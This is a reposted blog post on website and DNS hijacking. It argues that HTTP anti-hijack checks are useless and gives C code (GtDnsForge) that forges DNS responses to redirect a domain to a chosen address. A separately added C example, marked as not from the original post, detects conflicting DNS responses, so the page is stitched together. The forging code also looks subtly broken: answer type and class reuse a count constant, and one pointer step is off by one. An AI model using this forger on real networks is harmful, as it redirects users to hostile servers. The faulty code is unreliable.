How is website hijacking implemented?

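  How can you check a website's security status?
  iis7 website monitoring
  It checks whether a site has been hijacked, whether its DNS has been poisoned, and how fast the site loads.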
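  The principle and implementation of hijacking discussed here mainly concern HTTP services over TCP. A follower asked two questions.
  The first question: can a TCP-based HTTP service defend against hijacking? Many anti-hijacking methods for HTTP circulate online: checking the server address, splitting the request across fragments, detecting abnormal TTL values, refusing redirects. The conclusion is that none of them work. The network-layer address in a forged packet is the user's intended destination address to begin with, otherwise it would not be a forgery. If the web server can reassemble a fragmented request, so can the hijacking device, and besides, are you sure your fragments will not be merged at the network device layer before they are sent? TTL anomaly detection is completely unreliable. And even without a redirect, a 200 OK response can still make the client jump wherever the hijacker wants.
  The second question: can off-path (bypass) hijacking be done against UDP? The conclusion is yes. Unlike TCP, UDP is connectionless and stateless, so as long as the data is valid, whichever packet arrives first wins. Years ago carriers used a similar method to control the bandwidth consumed by P2P transfers. Let's go straight to the code; it is not complicated.
  DNS hijacking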
  UINT GtDnsForge(UCHAR* puszPacket, GTDNSHEADER_S* pstHead, GTDNSQUESTION_S* pstQues)
  {
      UCHAR* puszCur = puszPacket;
      /* dns header */
      /* transaction ID copied from the query */
      memcpy(puszCur, &pstHead->m_usIdent, sizeof(USHORT));
      puszCur += sizeof(USHORT);
      /* flags 0x8180: QR=1 (response), RD=1, RA=1, RCODE=0 */
      *(USHORT*)puszCur = htons(0X8180);
      /**(USHORT*)puszCur |= DNS_FLAG_QR;
      *(USHORT*)puszCur |= DNS_FLAG_AA;
      *(USHORT*)puszCur |= DNS_FLAG_RD;
      *(USHORT*)puszCur |= DNS_FLAG_RA;*/
      puszCur += sizeof(USHORT);
      *(USHORT*)puszCur = pstHead->m_usQuCount;   /* QDCOUNT */
      puszCur += sizeof(USHORT);
      *(USHORT*)puszCur = GT_DNS_AN;              /* ANCOUNT */
      puszCur += sizeof(USHORT);
      *(USHORT*)puszCur = GT_DNS_NA;              /* NSCOUNT */
      puszCur += sizeof(USHORT);
      *(USHORT*)puszCur = GT_DNS_AD;              /* ARCOUNT */
      puszCur += sizeof(USHORT);
      /* dns question */
      /* strcat appends at the first NUL, so this relies on the caller
         having zero-filled the packet buffer */
      strcat((char*)puszCur, pstQues->m_szUrl);
      puszCur += strlen(pstQues->m_szUrl) + 1;
      *(USHORT*)puszCur = pstQues->m_usType;      /* QTYPE */
      puszCur += sizeof(USHORT);
      *(USHORT*)puszCur = pstQues->m_usClass;     /* QCLASS */
      puszCur += sizeof(USHORT);
      /* dns answer */
      *(USHORT*)puszCur = GT_DNS_DOMAIN;          /* answer NAME */
      puszCur += sizeof(USHORT);
      *(USHORT*)puszCur = GT_DNS_AN;              /* answer TYPE */
      puszCur += sizeof(USHORT);
      *(USHORT*)puszCur = GT_DNS_AN;              /* answer CLASS */
      puszCur += sizeof(USHORT);
      *(UINT*)puszCur = GT_DNS_DEFAULT_TTL;       /* TTL */
      puszCur += sizeof(UINT);
      *(USHORT*)puszCur = GT_DNS_AN_SIZE;         /* RDLENGTH */
      puszCur += sizeof(USHORT);
      *(UINT*)puszCur = inet_addr(GT_DNS_HTML);   /* RDATA: IPv4 address */
      puszCur += sizeof(UINT) + 1;
      return (UINT)(puszCur - puszPacket);
  }
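
Because a UDP client accepts whichever valid response arrives first, the genuine answer usually still reaches the wire a moment later, and a passive sensor can use that. The following is an added example, not code from the original post: it flags two DNS responses that share a transaction ID and question but carry different A records. The names `parse_resp` and `conflicting` are hypothetical, and the sample packets are constructed with documentation addresses.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* First A record of one DNS response, plus the fields that identify the query. */
typedef struct { uint16_t id; const uint8_t *qname; size_t qlen; uint8_t addr[4]; } dns_resp;

/* Skip an encoded name (labels or compression pointer); returns 0 if malformed. */
static size_t skip_name(const uint8_t *p, size_t len, size_t off) {
    while (off < len) {
        if ((p[off] & 0xC0) == 0xC0) return off + 2 <= len ? off + 2 : 0;
        if (p[off] == 0) return off + 1;
        off += (size_t)p[off] + 1;
    }
    return 0;
}

/* Parse a one-question response; 0 on success, -1 if malformed or no A record. */
int parse_resp(const uint8_t *p, size_t len, dns_resp *out) {
    if (len < 12 || !(p[2] & 0x80) || p[4] != 0 || p[5] != 1) return -1; /* QR=1, QDCOUNT=1 */
    unsigned an = ((unsigned)p[6] << 8) | p[7];                          /* ANCOUNT */
    size_t off = skip_name(p, len, 12);
    if (!off || off + 4 > len) return -1;
    out->id = (uint16_t)((p[0] << 8) | p[1]); out->qname = p + 12; out->qlen = off - 12;
    off += 4;                                        /* QTYPE + QCLASS */
    while (an--) {
        off = skip_name(p, len, off);
        if (!off || off + 10 > len) return -1;       /* type, class, ttl, rdlength */
        unsigned type = ((unsigned)p[off] << 8) | p[off + 1];
        size_t rdlen = ((size_t)p[off + 8] << 8) | p[off + 9];
        off += 10;
        if (off + rdlen > len) return -1;
        if (type == 1 && rdlen == 4) { memcpy(out->addr, p + off, 4); return 0; }
        off += rdlen;
    }
    return -1;
}

/* 1 if two responses share transaction ID and question but give different A records. */
int conflicting(const uint8_t *a, size_t al, const uint8_t *b, size_t bl) {
    dns_resp x, y;
    if (parse_resp(a, al, &x) || parse_resp(b, bl, &y)) return 0;
    if (x.id != y.id || x.qlen != y.qlen || memcmp(x.qname, y.qname, x.qlen)) return 0;
    return memcmp(x.addr, y.addr, 4) != 0;
}

/* Constructed samples: two responses to "a.test" A?, ID 0x1234, documentation addresses. */
#define RESP(w, x, y, z) {0x12,0x34,0x81,0x80,0,1,0,1,0,0,0,0, 1,'a',4,'t','e','s','t',0, \
                          0,1,0,1, 0xC0,0x0C,0,1,0,1,0,0,0,60,0,4, w,x,y,z}
const uint8_t r1[] = RESP(203, 0, 113, 7), r2[] = RESP(192, 0, 2, 10);
int main(void) { printf("conflict=%d\n", conflicting(r1, sizeof r1, r2, sizeof r2)); return 0; }
```

A real sensor would also key the comparison on the client address and port and on a short time window, since transaction IDs are reused across unrelated queries.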

Reposted from: https://www.cnblogs.com/goodcola/p/11505007.html
